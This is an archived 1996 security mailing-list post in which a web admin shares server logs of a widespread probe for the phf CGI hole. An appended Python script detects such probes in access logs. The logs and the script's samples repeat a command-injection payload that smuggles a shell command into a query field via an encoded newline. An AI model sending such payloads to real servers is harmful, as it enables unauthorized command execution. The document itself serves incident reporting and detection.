From randy@sierra.zyzzyva.com Thu Jul 25 02:48:27 1996
Received: from sierra.zyzzyva.com (ppp0.zyzzyva.com [198.183.2.50])
    by suburbia.net (8.7.4/Proff-950810) with ESMTP id CAA22455
    for ; Thu, 25 Jul 1996 02:48:19 +1000
Received: from sierra.zyzzyva.com (localhost [127.0.0.1])
    by sierra.zyzzyva.com (8.7.5/8.7.3) with ESMTP id LAA11168
    for ; Wed, 24 Jul 1996 11:47:05 -0500 (CDT)
Message-Id: <199607241647.LAA11168@sierra.zyzzyva.com>
To: best-of-security@suburbia.net
Subject: Aggressive Web Vulnerability Probe
X-uri: http://www.zyzzyva.com/
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 24 Jul 1996 11:47:04 -0500
From: Randy Terbush

I'm forwarding the following log info for a recent probe on some of our web servers. From conversations with other web admins across the country, this probe has been extremely far reaching. Attempts to contact the source of the probe have been unsuccessful.

The hole that this probe is looking for has long since been announced. Bear in mind that the attacker could be spoofing this address; however, I would think that it would change addresses occasionally if that was the case. All probes across the country have originated from this same address.

First the accesses:

sentry.wood.com - - [14/Jul/1996:22:43:17 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419
sentry.wood.com - - [15/Jul/1996:00:26:34 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419
sentry.wood.com - - [15/Jul/1996:10:25:47 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419
sentry.wood.com - - [15/Jul/1996:03:18:35 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419
sentry.wood.com - - [15/Jul/1996:07:42:14 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419

And the errors:

[Mon Jul 15 05:54:09 1996] access to /docroot/global/groundwater.org/cgi-bin failed for sentry.wood.com, reason: File does not exist
[Mon Jul 15 02:02:55 1996] access to /docroot/global/infotravel.com/cgi-bin/phf failed for 204.253.173.9, reason: File does not exist
[Mon Jul 15 04:58:18 1996] access to /docroot/global/innovativ.com/cgi-bin failed for sentry.wood.com, reason: File does not exist
[Mon Jul 15 05:04:38 1996] access to /docroot/global/ncite.org/cgi-bin failed for sentry.wood.com, reason: File does not exist
[Mon Jul 15 02:34:43 1996] access to /docroot/global/remax-central.com/cgi-bin failed for sentry.wood.com, reason: File does not exist
[Mon Jul 15 04:07:04 1996] access to /docroot/global/sportdoc.com/cgi-bin failed for sentry.wood.com, reason: File does not exist
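
Added example, not part of the original post: a log-review script that finds requests shaped like the ones above (a phf request whose query string carries a URL-encoded line terminator) and groups them by source host, listing any that did not get a 404 so an admin can see whether a probe reached a real script. The function names, the "review" field and the two example.net/example.org log lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) \S+$')
ENCODED_EOL = re.compile(r"%0[ad]", re.IGNORECASE)  # URL-encoded LF or CR

# The first two lines are from the post; the last two are constructed.
SAMPLE = [
    'sentry.wood.com - - [14/Jul/1996:22:43:17 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419',
    'sentry.wood.com - - [15/Jul/1996:00:26:34 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id" 404 419',
    'scanner.example.net - - [15/Jul/1996:11:02:10 -0500] "GET /cgi-bin/phf?Qalias=foo%0a id HTTP/1.0" 200 312',
    'client.example.org - - [15/Jul/1996:11:05:00 -0500] "GET /index.html HTTP/1.0" 200 1024',
]

def parse(line):
    """Return host, time, request target and status, or None if not CLF."""
    m = CLF.match(line.strip())
    if not m:
        return None  # skip lines we cannot parse rather than guess
    host, when, request, status = m.groups()
    _method, _, target = request.partition(" ")
    target = re.sub(r" HTTP/\d\.\d$", "", target)  # protocol may be absent
    return {"host": host, "time": when, "target": target, "status": int(status)}

def is_phf_probe(entry):
    """True for a /cgi-bin/phf request with an encoded CR/LF in the query."""
    path, _, query = entry["target"].partition("?")
    return path.lower().endswith("/cgi-bin/phf") and bool(ENCODED_EOL.search(query))

def summarize(lines):
    """Count probes per source host; collect responses that were not 404."""
    report = defaultdict(lambda: {"probes": 0, "review": []})
    for line in lines:
        entry = parse(line)
        if entry and is_phf_probe(entry):
            rec = report[entry["host"]]
            rec["probes"] += 1
            if entry["status"] != 404:  # the path exists on this server
                rec["review"].append((entry["time"], entry["status"]))
    return dict(report)

if __name__ == "__main__":
    for host, rec in summarize(SAMPLE).items():
        print(host, rec["probes"], "probe(s); non-404 responses:", rec["review"])
```
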